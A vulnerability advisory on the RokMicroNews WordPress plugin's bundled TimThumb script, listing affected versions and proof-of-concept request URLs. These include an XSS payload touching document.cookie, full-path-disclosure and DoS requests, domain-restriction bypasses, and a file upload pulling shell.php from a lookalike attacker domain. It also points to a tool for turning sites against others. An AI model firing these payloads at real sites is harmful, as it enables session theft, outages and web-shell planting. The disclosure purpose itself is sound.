Affected products:
-------------------------
Vulnerable are RokMicroNews 1.5 and previous versions (to attacks on
TimThumb and all versions are vulnerable to FPD).
Besides standalone WP plugin, this web application comes as part of the
themes. Many of 56 RocketTheme's WP themes
(http://www.rockettheme.com/wordpress-themes) use RokMicroNews and old
versions of these themes are vulnerable to attacks on TimThumb (and all
versions of them are vulnerable to FPD).
-------------------------
Affected vendors:
-------------------------
RocketTheme
http://www.rockettheme.com
----------
Details:
----------
XSS (WASC-08):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1111111&w=1
Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)
DoS (WASC-10):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)
About such Abuse of Functionality and Denial of Service vulnerabilities you
can read in my article Using of the sites for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be
used.
Arbitrary File Upload (WASC-31):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php
This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5
months after my disclosure of previous holes.
Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php
Tidak ada komentar